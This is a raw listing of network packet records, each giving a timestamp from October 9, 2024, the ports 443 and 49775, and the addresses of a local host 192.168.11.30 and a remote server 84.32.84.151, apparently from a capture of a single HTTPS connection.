Oct 9, 2024 16:29:50.880029917 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880075932 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880171061 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.880171061 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.880182028 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880386114 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880520105 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.880532980 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880676031 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880754948 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880871058 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.880883932 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.880974054 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881035089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881035089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881035089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881035089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881035089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881053925 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881066084 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881066084 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881150007 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881225109 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881226063 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881237984 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881331921 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881406069 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881406069 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881460905 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881469965 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881521940 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881546974 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881728888 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.881740093 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.881936073 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.988909960 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989121914 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989123106 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.989135981 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989285946 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989305973 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.989316940 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989422083 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989445925 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989552975 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.989576101 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989602089 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989613056 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989644051 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.989654064 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989773035 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.989782095 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.989928961 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.989939928 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990051031 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990123987 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.990132093 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990164042 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990241051 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.990252018 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990345001 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990423918 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.990433931 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990535975 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990546942 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990566015 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.990628004 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990726948 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990829945 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990916967 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.990943909 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.990957022 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.991086006 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.991095066 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.991223097 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.991462946 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.991476059 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.991594076 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.991997004 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.992280960 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992361069 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992393970 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992460012 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992477894 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.992491007 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992583036 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992646933 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.992659092 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992738008 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.992747068 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992764950 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992867947 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.992876053 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.992955923 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993000031 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.993010998 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993127108 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.993134975 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993149042 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993269920 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.993278980 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993329048 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993521929 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993608952 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.993621111 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993715048 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.993725061 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.994061947 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.994076014 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.994085073 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.994205952 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.994214058 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.994285107 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.994530916 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.994544029 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.994648933 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.994854927 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.994868994 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995002031 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.995047092 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995058060 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995116949 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.995131016 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995466948 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.995477915 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995588064 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.995623112 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995812893 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995820045 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.995935917 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.996005058 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996053934 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.996404886 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.996520042 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.996577978 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996582031 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996583939 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996586084 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996771097 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996774912 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.996871948 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.996964931 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.997154951 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.997327089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.997348070 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.997350931 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.997351885 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.997457027 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.997795105 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.997924089 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.997925043 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.997930050 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.998116016 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.998117924 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.998262882 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.998297930 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.998379946 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.998730898 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.998862028 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.998873949 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.998877048 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.998882055 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.999198914 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.999258041 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.999315023 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.999640942 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:50.999666929 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.999783039 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:50.999833107 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.000160933 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.000217915 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.000253916 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.000591040 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.000732899 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.000781059 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.001056910 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.001164913 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.001174927 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.001526117 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.001642942 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.001739979 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.001993895 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.002113104 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.002461910 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.002580881 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.002698898 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.002929926 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.003046036 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.003082991 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.003397942 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.003490925 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.003853083 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.003983021 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.004345894 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.060102940 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060323954 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060364962 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.060376883 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060386896 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060468912 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.060472012 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060597897 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060611963 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.060621977 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.060703039 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.060818911 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.061630011 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.061707020 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.061753035 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.061781883 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.061791897 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.061856031 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.061867952 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.061896086 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.061976910 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.061986923 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062001944 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062131882 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062144041 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062186956 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062262058 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062272072 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062386990 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062405109 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062416077 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062521935 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062532902 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062653065 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062736988 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062745094 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062799931 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062808037 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.062912941 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.062957048 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063016891 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.063025951 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063121080 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063133001 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.063342094 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.063352108 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063436031 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063510895 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.063520908 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063649893 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063657999 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063667059 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.063771009 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.063781023 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.063899994 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.064351082 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064389944 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064445972 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064500093 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.064512014 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064543009 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064577103 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.064587116 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064654112 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.064659119 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064745903 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.064755917 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064821959 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.064876080 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.064888954 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065011024 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065018892 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.065136909 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065149069 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.065159082 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065203905 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065399885 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065499067 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.065507889 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065578938 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065603971 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.065613985 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065733910 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.065742970 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065769911 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065864086 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.065872908 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.065958023 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066215038 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.066225052 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066332102 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.066342115 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066462040 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.066471100 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066529036 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066812992 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.066821098 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066906929 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.066919088 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.067096949 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.067267895 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.067285061 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.067373991 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.067737103 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.067858934 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.067861080 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.067862988 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.067866087 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.068052053 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.068203926 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.068320990 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.068628073 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.068645954 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.068672895 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.068789005 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.069010973 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.069137096 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.069272041 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.069586992 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.069588900 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.069591045 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.069608927 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.069724083 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.070074081 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.070163965 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.070167065 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.070169926 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.070182085 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.070530891 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.070637941 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.070741892 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.070998907 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.071141005 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.071141958 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.071480036 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.071528912 CEST	443	49775	84.32.84.151	192.168.11.30
Oct 9, 2024 16:29:51.071597099 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.071934938 CEST	49775	443	192.168.11.30	84.32.84.151
Oct 9, 2024 16:29:51.072063923 CEST	49775	443	192.168.11.30	84.32.84.151
